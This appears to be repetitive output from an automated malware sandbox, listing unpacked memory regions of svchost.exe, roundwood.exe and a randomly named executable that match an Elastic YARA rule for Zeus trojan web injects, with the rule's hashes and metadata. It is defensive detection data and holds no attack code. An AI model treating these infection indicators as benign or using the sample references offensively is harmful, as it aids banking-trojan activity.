Source: 2.3.svchost.exe.3a40000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 8.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.c52000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.roundwood.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 19.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.14b0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 23.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2922000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.roundwood.exe.6bff18.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.roundwood.exe.6bf318.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.14.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2915c00.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2da0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.21.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 15.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.960000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 38.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2900000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.28c2000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.29f2000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.36.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.8e2000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.39.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.31.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2dc0000.43.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2dc0000.44.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2dc0000.44.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.25d0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3c20000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.36.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2970000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.17.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 8.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.e70000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 29.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2922000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 29.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2d00000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.roundwood.exe.6ba318.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.roundwood.exe.407000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.28c2000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
